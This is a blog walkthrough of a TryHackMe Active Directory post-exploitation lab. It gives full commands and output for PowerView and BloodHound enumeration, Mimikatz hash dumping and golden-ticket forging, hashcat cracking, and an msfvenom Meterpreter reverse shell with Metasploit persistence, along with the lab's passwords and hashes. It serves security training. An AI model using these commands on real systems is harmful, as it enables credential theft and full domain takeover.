TryHackMe – Post-Exploitation Basics Write-up

1. Introduction

This challenge on TryHackMe (THM) will only be covering on the basics of what we usually do after gaining access to a machine that is in an Active Directory (AD) network. Enumeration via Powerview and Bloodhound will be done along with dumping password hashes and Golden ticket using Mimikatz. Further information gathering will be done using Windows server tools and logs. Finally, Metasploit module will be used for persistency.

2. Enumeration with Powerview

Firstly, remember to connect to the TryHackMe (THM)’s VPN before SSH into the given IP address and credentials.

kali@kali~$ ssh Administrator@10.10.90.150
The authenticity of host '10.10.90.150 (10.10.90.150)' can't be established.
ECDSA key fingerprint is SHA256:jGGFsdyc6+usho+SGSQoG+3agPMuI+Y0SYylUJfLP8s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.90.150' (ECDSA) to the list of known hosts.
Administrator@10.10.90.150's password: P@$$W0rd

Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>

Powerview is a very powerful PowerShell script that is from PowerShell Empire. We can use Powerview to enumerate the domain once we have access to a machine in the network. The creator of this challenge has already placed Powerview on the remote machine for us.

Firstly, we will have to launch PowerShell with the execution policy bypassed so that we can run scripts.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator> 

Next, we can start PowerView and enumerate domain users.

PS C:\Users\Administrator> . .\Downloads\PowerView.ps1
PS C:\Users\Administrator> Get-NetUser | select cn

cn                  
--                          
Administrator               
Guest                       
krbtgt                      
Machine-1                   
Admin2                      
Machine-2                   
SQL Service                 
POST{P0W3RV13W_FTW}         
sshd

We can also enumerate domain groups.

PS C:\Users\Administrator> Get-NetGroup -GroupName *admin*
Administrators 
Hyper-V Administrators         
Storage Replica Administrators 
Schema Admins                  
Enterprise Admins              
Domain Admins                  
Key Admins                     
Enterprise Key Admins       
DnsAdmins

A cheatsheet for PowerView was provided to us by the creator of this challenge.

Questions and answers

What is the shared folder that is not set by default?

PS C:\Users\Administrator> Invoke-ShareFinder
\\Domain-Controller.CONTROLLER.local\ADMIN$     - Remote Admin 
\\Domain-Controller.CONTROLLER.local\C$         - Default share
\\Domain-Controller.CONTROLLER.local\IPC$       - Remote IPC
\\Domain-Controller.CONTROLLER.local\NETLOGON   - Logon server share
\\Domain-Controller.CONTROLLER.local\Share      -
\\Domain-Controller.CONTROLLER.local\SYSVOL     - Logon server share

Answer:

Share

What operating system is running inside of the network besides Windows Server 2019?

PS C:\Users\Administrator> Get-NetComputer -fulldata | select operatingsystem

operatingsystem                  
---------------
Windows Server 2019 Standard
Windows 10 Enterprise Evaluation
Windows 10 Enterprise Evaluation

Answer:

Windows 10 Enterprise Evaluation

I’ve hidden a flag inside of the users find it

Answer:

POST{P0W3RV13W_FTW} 

3. Enumeration with Bloodhound

Bloodhound is a graphical user interface (GUI) tool that will help us to visually map out the network in the system. Bloodhound comes along with a tool called Sharphound which is similar to PowerView where it takes information such as users, groups, etc, stores them in a .JSON file to be used inside Bloodhound. The creator of this challenge has already placed Sharphound in the victim’s machine for us.

Installation

Install Bloodhound on your attacker machine such as Kali.

kali@kali~$ sudo apt-get update && sudo apt-get install bloodhound

Getting loot with Sharphound

First things first, we will need to launch PowerShell from CMD with the execution policy bypassed. You can skip this step if you are still in the PowerShell launched previously. Next, run the Sharphound PowerShell script.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator> . .\Downloads\SharpHound.ps1
PS C:\Users\Administrator> 

Finally, we can collect all information using Sharphound and store it in a ZIP file.

PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
----------------------------------------------- 
Initializing SharpHound at 1:33 AM on 1/13/2022
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL
[+] Cache File Found! Loaded 104 Objects in cache 

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 92 MB RAM 
Status: 66 objects finished (+66 8)/s -- Using 97 MB RAM 
Enumeration finished in 00:00:00.2933812 
Compressing data to C:\Users\Administrator\20220113013345_loot.zip
You can upload this file directly to the UI 

SharpHound Enumeration Completed at 1:33 AM on 1/13/2022! Happy Graphing!

We can transfer the ZIP file back to our attacking machine using SCP.

kali@kali~$ scp Administrator@10.10.90.150:20220113013345_loot.zip /tmp/20220113013345_loot.zip
Administrator@10.10.90.150's password: P@$$W0rd
20220113013345_loot.zip

Map the network with Bloodhound

Firstly, we will need to start neo4j before starting Bloodhound in another terminal.

kali@kali~$ sudo neo4j console

The default credentials for neo4j is neo4j:neo4j. We will need to change it at http://localhost:7474/browser/. Otherwise, Bloodhound will not let us login.

Once connected, it will automatically prompt us for a new password. Change to a password you can remember.

Launch Bloodhound.

kali@kali~$ bloodhound

You should now be able to login using the default username and your new password.

Click on the Import Graph button on the right-hand side of Bloodhound window to import the ZIP file. If it does not work (such as bad .JSON file notification), drag and drop the ZIP file into the Bloodhound window.

We can now click on the menu and choose any query we are interested.

Questions and answers

What service is also a domain admin

Click on “Find all Domain Admins” and point your mouse over to the nodes. One of them will show the admin account to be “SQLSERVICE”.

Answer:

SQLSERVICE

What two users are Kerberoastable?

Click on “List all Kerberoastable Accounts”.

Answer:

SQLSERVICE,KRBTGT

4. Dumping hashes with mimikatz

Mimikatz is a popular tool for dumping passwords as well as for other purposes like generating silver/golden tickets, etc. We will be touching on dumping NTLM hashes from LSA secrets which is a storage used by Local Storage Authority (LSA) which stores password hashes in registry “HKLM:\Security\Policy\Secrets”. The creator of this challenge has already placed Mimikatz in the victim’s machine for us.

Dump hashes

Launch Mimikatz from the \Download folder and ensure “privilege::debug” output is “Privilege ’20’ ok”. Mimikatz must be run from the administrator shell to dump hashes from LSA secrets. When we SSH into the victim’s machine, it should be in the administrator shell by default.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>cd Downloads && mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 May  2 2020 16:23:51              
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                               
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )  
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz                    
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com ) 
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/ 

mimikatz # privilege::debug
Privilege '20' OK 
                  
mimikatz # 

We can now dump the hashes.

mimikatz # lsadump::lsa /patch 
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf

RID  : 0000044f (1103)
User : Machine1
LM   :
NTLM : 64f12cddaa88057e06a81b54e73b949b

RID  : 00000451 (1105) 
User : Admin2
LM   :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe

RID  : 00000452 (1106)
User : Machine2
LM   :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0

RID  : 00000453 (1107)
User : SQLService
LM   :
NTLM : f4ab68f27303bcb4024650d8fc5f973a
...

Cracking those hashes with hashcat

As the question wants us to crack machine1’s hash, I will be cracking it instead of the example on TryHackMe (THM) which cracked Administrator’s hash instead.

Firstly, we have to unzip /usr/share/wordlists/rockyou.txt.gz.

kali@kali~$ sudo gunzip /usr/share/wordlists/rockyou.txt.gz

I stored the hashes of machine1 and machine2 in hash.txt. Finally, we can crack the hashes.

kali@kali~$ hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
...
64f12cddaa88057e06a81b54e73b949b:Password1

Questions and answers

what is the Machine1 Password?

Password1

What is the Machine2 Hash?

c39f2beb3d2ec06a62cb887fb391dee0

5. Golden Ticket Attacks with mimikatz

Previously we noticed that when we dump hashes from LSA secrets, there is krbtgt’s hash. When a user submits a request for a TGT, the KDC encrypts the TGT using krbtgt account’s password hash as the secret key for the encryption. Thus, having the security identifier (SID) and NTLM hash of krbtgt account allows us to create a custom TGT which is also known as a golden ticket. Having a golden ticket allows us to any machine or account in the Active Directory (AD) network.

Firstly, we will need to use RDP to access the victim machine as we need to spawn another shell/CMD window later after generating a golden ticket. Using SSH will not allow us to access the evaluated shell later.

kali@kali~$ rdesktop -u Administrator -d CONTROLLER 10.10.90.150

Dump krbtgt’s hash

Firstly, we will need to launch Mimikatz from the administrator shell and check its privileges using “privilege::debug“.

C:\Users\Administrator>cd Downloads && mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 May  2 2020 16:23:51              
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                               
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )  
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz                    
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com ) 
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/ 

mimikatz # privilege::debug 
Privilege '20' OK 
                  
mimikatz # 

We can now dump the hash of krbtgt account.

mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 
                                                              
RID  : 000001f6 (502)                                         
User : krbtgt                                                
                                                              
 * Primary                                                    
    NTLM : 5508500012cc005cf7082a9a89ebdfdf                   
    LM   :                                                    
  Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf                 
    ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf                 
    lm  - 0: 372f405db05d3cafd27f8e6a4a097b2c

Create a golden ticket

We can actually create a ticket using any username. Only the SID, domain name and password hash must be correct which is krbtgt’s SID and password hash. However, I will be using the username “Administrator” instead. Uid is set to 500 which is the RID of the domain admin, giving it the most privilege in the whole AD.

mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
User      : Administrator 
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-849420856-2351964222-986696166
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
Lifetime  : 1/13/2022 7:15:55 PM ; 1/11/2032 7:15:55 PM ; 1/11/2032 7:15:55 PM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed 
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

Using the Golden Ticket to access other machine

We can now spawn an elevated shell from Mimikatz.

mimikatz # misc::cmd

By right we can use “psexec.exe \\Desktop-1 cmd.exe” in the elevated shell. However, THM does not support having multiple machines in a network. Thus, we cannot get to try accessing other machines with the golden ticket.

6. Enumerating with Server Manager

To access the Server Manager, we must RDP into the victim’s machine. Similar to task 5, we can use rdekstop.

kali@kali~$ rdesktop -u Administrator -d CONTROLLER 10.10.90.150

Enumeration with Server Manager

The manager tab in Server Manager allows us to add roles and features. However, this is not really recommended as the system admin will detect this easily. We can ignore AD CS, AD DS, DNS, or File and Storage Services as they are not useful for post-exploitation.

Navigate to the Tools tab and select “Active Directory Users and Computers”.

Over here, we can see all the domain users and groups. Sometimes password is stored in the description as well.

Questions and answers

What tool allows to view the event logs?

Event Viewer

What is the SQL Service password

MYpassword123#

7. Maintaining Access

There are many ways to maintain access on a machine. However, this challenge on TryHackMe used the persistence module from Metasploit. To do that, we will need a Meterpreter shell on the victim’s machine.

Generate meterpreter reverse shell

Firstly, we will need to generate a Windows meterpreter reverse TCP shell.

kali@kali~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.2 LPORT=5555 -f exe -o shell.exe

Transfer payload shell file

We will need to transfer the file to the victim’s machine. We can do so using SCP since there is an SSH service available. After transferring the file, we can SSH into the machine and verify if the file is successfully transferred.

kali@kali~$ scp shell.exe Administrator@10.10.90.150:shell.exe
Administrator@10.10.90.150's password: P@$$W0rd
shell.exe

kali@kali~$ ssh Administrator@10.10.90.150
Administrator@10.10.90.150's password: P@$$W0rd

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>dir
 Volume in drive C has no label.                                 
 Volume Serial Number is F83F-6346                               
                                                                 
 Directory of C:\Users\Administrator                             
                                                                 
01/13/2022  08:36 PM    <DIR>          .                         
01/13/2022  08:36 PM    <DIR>          ..                        
05/13/2020  07:01 PM    <DIR>          3D Objects                
05/13/2020  07:01 PM    <DIR>          Contacts                  
05/13/2020  07:01 PM    <DIR>          Desktop                   
05/14/2020  07:27 PM    <DIR>          Documents                 
01/13/2022  07:50 PM    <DIR>          Downloads                 
05/13/2020  07:01 PM    <DIR>          Favorites                 
05/13/2020  07:01 PM    <DIR>          Links                     
05/13/2020  07:01 PM    <DIR>          Music                     
05/13/2020  07:01 PM    <DIR>          Pictures                  
05/13/2020  07:01 PM    <DIR>          Saved Games               
05/13/2020  07:01 PM    <DIR>          Searches                  
01/13/2022  08:36 PM            73,802 shell.exe                 
05/13/2020  07:01 PM    <DIR>          Videos

Start a listener and receive a shell

Launch Metasploit using “msfconsole” command and use "exploit/multi/handler” to listen to an incoming reverse shell.

kali@kali~$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > 

We can now set our payload, fill up LHOST and LPORT options, and run it. Note that LHOST is your attacking machine’s IP address.

msf6 exploit(multi/handler) > set LHOST 192.168.126.2
LHOST => 192.168.1.2
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > run

Transfer shell.exe to the victim’s machine and run it. Our meterpreter listener should receive an incoming connection. Background the meterpreter shell if yours directly access the session for you.

meterpreter> bg
msf6 exploit(multi/handler) > 

Run the persistence module

We can now use the persistence module so that even when the machine reboots, we will get back a connection to obtain a shell. Set the session to the session ID our meterpreter session to the victim’s machine is in. You can use “sessions” command to list all the sessions if you are unsure. Once we run the persistence module, the old session will die and a new session will be spawned.

msf6 exploit(multi/handler) > use exploit/windows/local/persistence
msf6 exploit(exploit/windows/local/persistence) > set session 1
msf6 exploit(exploit/windows/local/persistence) > run
meterpreter>

There we go, we now obtained persistence in the victim’s machine.

I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.